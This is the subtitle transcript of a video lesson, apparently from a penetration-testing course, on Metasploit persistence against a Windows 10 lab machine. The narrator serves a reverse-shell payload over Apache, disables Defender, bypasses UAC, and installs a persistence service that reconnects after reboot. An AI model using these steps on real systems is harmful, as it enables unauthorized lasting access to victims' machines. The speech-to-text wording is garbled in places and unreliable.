1
00:00:00,390 --> 00:00:01,110
Welcome back.

2
00:00:01,330 --> 00:00:08,190
And in this video, I want to talk about something called persistence and what is persistence?

3
00:00:08,200 --> 00:00:14,880
Well, persistence is a module that allows us to stay on the target machine even after the target machine

4
00:00:14,880 --> 00:00:15,740
gets rebooted.

5
00:00:16,260 --> 00:00:22,560
So it is essentially adding our payload to the start up folders where it will automatically get started

6
00:00:22,560 --> 00:00:25,580
as soon as the target system gets restarted.

7
00:00:26,100 --> 00:00:28,470
It is a part of maintaining access.

8
00:00:28,620 --> 00:00:32,920
So this is one of the things that we want to do as soon as we get on the target machine.

9
00:00:33,300 --> 00:00:38,160
So what it did right here is establish an interpreter session with the target machine.

10
00:00:38,490 --> 00:00:45,940
I used this module to bypass UAC and get the system privileges on my Windows 10 virtual machine.

11
00:00:46,230 --> 00:00:51,960
And the reason why I'm testing this on a virtual machine is because in this video, I will have to restart

12
00:00:51,960 --> 00:00:57,450
this machine to see whether the persistance is working and how I transferred the shadow to accede to

13
00:00:57,450 --> 00:00:58,110
the Windows 10.

14
00:00:58,410 --> 00:01:04,910
Well, I use the code way of transferring it using the Apache Web server, and to do that you can just

15
00:01:04,920 --> 00:01:08,310
type system ctrl and then start.

16
00:01:09,920 --> 00:01:16,430
And then type Apache to this will ask you for your password and put it right here and this will start

17
00:01:16,430 --> 00:01:17,640
the Apache Web server.

18
00:01:18,020 --> 00:01:23,600
Now what you can do is you can open up Internet Explorer on the target machine and type in the IP address

19
00:01:23,600 --> 00:01:27,780
of your clinics, which will lead you to the Web page of our Linux machine.

20
00:01:28,370 --> 00:01:33,440
Now, you will not see this channel, but you see right there, it is there because I put the payload

21
00:01:33,440 --> 00:01:34,940
inside of the Web server directory.

22
00:01:35,390 --> 00:01:42,290
And to do that inside Linux, after you create the payload, you can navigate to this far slash W w

23
00:01:42,290 --> 00:01:48,830
W and slash HTML directory where you should have two files called index and then dot something.

24
00:01:49,460 --> 00:01:55,650
You can delete those files and you can copy your payload to this HTML directory right here.

25
00:01:56,240 --> 00:02:02,090
Then if you go to your Windows 10 machine, refresh the page, you will have your Shell acce available

26
00:02:02,090 --> 00:02:04,040
to download on your windows and machine.

27
00:02:05,060 --> 00:02:10,490
Just make sure that you disable the Windows defender on your Windows 10 machine, because we're using

28
00:02:10,490 --> 00:02:15,830
a regular interpreter, reverse DCP Shell and it gets detected by the Windows defender.

29
00:02:16,100 --> 00:02:21,200
So after you do all of that and establish the connection, you can then gain system privileges.

30
00:02:21,200 --> 00:02:23,010
And we already know how to do that.

31
00:02:23,030 --> 00:02:28,880
We seem to just test a bunch of those modules that are used to bypass UAC and then we become the system

32
00:02:28,880 --> 00:02:29,660
level account.

33
00:02:30,420 --> 00:02:34,190
Once you do all of that, it is time to run the persistance module.

34
00:02:34,340 --> 00:02:35,540
So how can we do that?

35
00:02:35,630 --> 00:02:41,780
Well, first of all, our background this session and if we type sessions, you can see I have two sessions

36
00:02:41,780 --> 00:02:42,190
available.

37
00:02:42,350 --> 00:02:49,700
The one is on the regular user account and the one is that I elevated, which is this system level account.

38
00:02:50,390 --> 00:02:58,500
So what they want to do to run the persistance is I can type this search persistance inside of my absolute

39
00:02:58,550 --> 00:02:59,060
framework.

40
00:02:59,450 --> 00:03:02,180
This will output me with a bunch of different modules.

41
00:03:02,390 --> 00:03:07,780
And the one that we're going to cover in this video is going to be this one right here.

42
00:03:08,210 --> 00:03:12,560
Exploit Windows Local and then persistance service.

43
00:03:13,010 --> 00:03:17,270
If I copy the module name, go down here and type Qs.

44
00:03:19,400 --> 00:03:27,320
Pays the module press enter, it will set my payload to win the SM, reverse DCP and if I type show

45
00:03:27,320 --> 00:03:33,470
info here, we can see that this module would generate and upload the executable to a remote host.

46
00:03:33,980 --> 00:03:36,400
Next, it will make a persistent service.

47
00:03:36,650 --> 00:03:41,150
It will create a new service which will start the payload whenever the service is running.

48
00:03:41,300 --> 00:03:45,060
Admin or system privilege is required for this module to run.

49
00:03:45,410 --> 00:03:49,330
That is why we created the second session with the system privileges.

50
00:03:50,180 --> 00:03:55,970
So what we need to specify right here, if potential options is we need to set the session and here

51
00:03:55,970 --> 00:03:58,880
we are going to set the session with the system level account.

52
00:03:58,880 --> 00:04:00,920
In my case, I believe it is session two.

53
00:04:01,460 --> 00:04:02,360
That is correct.

54
00:04:02,360 --> 00:04:05,980
And right here, we want to set our payload options.

55
00:04:06,470 --> 00:04:11,390
Of course, if we want to, you can set these other options as well, such as free trade time and free

56
00:04:11,390 --> 00:04:11,630
trade.

57
00:04:11,630 --> 00:04:16,400
Time is simply just the time that we try to connect to if the connection fails.

58
00:04:16,670 --> 00:04:18,280
Five seconds is default.

59
00:04:18,500 --> 00:04:22,190
Now, we can set that to be, for example, ten seconds.

60
00:04:22,250 --> 00:04:23,500
It doesn't have to be five.

61
00:04:23,540 --> 00:04:24,710
That would be too quick.

62
00:04:24,710 --> 00:04:32,720
And after we do all of that, we can run this module press run and this will open the session.

63
00:04:32,930 --> 00:04:33,290
Three.

64
00:04:33,440 --> 00:04:36,740
If I type get you ready, we will be the system level account.

65
00:04:36,950 --> 00:04:42,740
But what is special about the session is that it will automatically connect back to us even after the

66
00:04:42,740 --> 00:04:44,540
target machine is rebooted.

67
00:04:45,170 --> 00:04:48,280
So the target won't need to run this shelter.

68
00:04:48,920 --> 00:04:55,040
After the system is restarted, it will automatically connect back to us again because we ran this persistance

69
00:04:55,040 --> 00:04:55,470
module.

70
00:04:56,060 --> 00:04:57,140
Let me show you what I mean.

71
00:04:57,680 --> 00:05:05,150
If in my interpreter session I run the reboot command press enter this will start restarting the Windows

72
00:05:05,150 --> 00:05:05,690
10 machine.

73
00:05:06,140 --> 00:05:10,040
All of the other sessions will die out because the connection has been closed.

74
00:05:10,250 --> 00:05:16,550
If I control see this exit out of this type sessions, we will have no active sessions anymore.

75
00:05:17,330 --> 00:05:26,300
So what we can do right now is we can type, use, exploit, multi handler set the correct payload and

76
00:05:26,300 --> 00:05:31,580
inside of the show options, we want to set the correct options that we use inside of our persistance

77
00:05:31,580 --> 00:05:32,150
module.

78
00:05:32,150 --> 00:05:34,580
And that is the port for four four four.

79
00:05:35,950 --> 00:05:41,950
And the IP address of our Kalinda's machine, so all I need to do right now is type from.

80
00:05:45,080 --> 00:05:50,660
And here we get the session open because this machine hasn't yet shut down, so we're just going to

81
00:05:50,660 --> 00:05:53,470
close this because this is not the session that we wanted to.

82
00:05:53,840 --> 00:06:01,720
And I'm going to manually exit out of this machine and go and start it once again.

83
00:06:02,360 --> 00:06:05,960
Now that the machine is getting started up, I will run our listener.

84
00:06:06,380 --> 00:06:10,340
And if everything worked correctly, we should get an interpreter.

85
00:06:10,340 --> 00:06:17,180
Session opened as soon as the machine puts up without the target having to do anything but start their

86
00:06:17,180 --> 00:06:17,560
machine.

87
00:06:18,080 --> 00:06:19,510
So let's see whether it will work.

88
00:06:20,000 --> 00:06:22,310
The machine is currently starting up.

89
00:06:23,120 --> 00:06:24,590
And let's give it a few seconds.

90
00:06:27,580 --> 00:06:34,090
And here at this hour, an interpreter, Section five opened on its own and noticed that it didn't even

91
00:06:34,090 --> 00:06:36,070
login to the user yet.

92
00:06:36,730 --> 00:06:43,570
And the best part about this is that if we type get user I.D., I will already be system level account.

93
00:06:43,780 --> 00:06:47,410
So I didn't have to go through the privilege escalation process again.

94
00:06:48,350 --> 00:06:55,090
This bitter session opened without anyone clicking on anything, and that is the good part about persistence.

95
00:06:55,220 --> 00:07:02,330
Now, even if the target shut down this PC once again and started it in a week or two, our persistence

96
00:07:02,360 --> 00:07:08,180
will still work and our payload will automatically connect back to our killing machine if the IP address

97
00:07:08,180 --> 00:07:09,790
of the clinic's machine hasn't changed.

98
00:07:09,800 --> 00:07:15,710
Of course, one more thing to keep in mind is that sometimes persistence can be buggy so it knows not

99
00:07:15,710 --> 00:07:19,170
to work sometimes, but in most cases it should work.

100
00:07:19,190 --> 00:07:22,940
And if it doesn't, there are other modules for persistence as well.

101
00:07:22,950 --> 00:07:26,580
If I type background and search persistence.

102
00:07:28,070 --> 00:07:32,680
I used this model right here, but you can see there are other modules as well.

103
00:07:32,900 --> 00:07:34,850
You can check them out if you want to.

104
00:07:34,880 --> 00:07:38,380
Maybe they will work better, maybe they will suit your needs more.

105
00:07:38,690 --> 00:07:44,130
But whichever one you find work, just use it and you will maintain access on the target system.

106
00:07:44,900 --> 00:07:45,310
Great.

107
00:07:45,320 --> 00:07:50,570
Now that we covered persistance in the next video, we're going to cover the USACHEV post expectation

108
00:07:50,570 --> 00:07:56,630
modules and a few more useful commands that we can do after exploiting the target scene in the next

109
00:07:56,630 --> 00:07:56,930
video.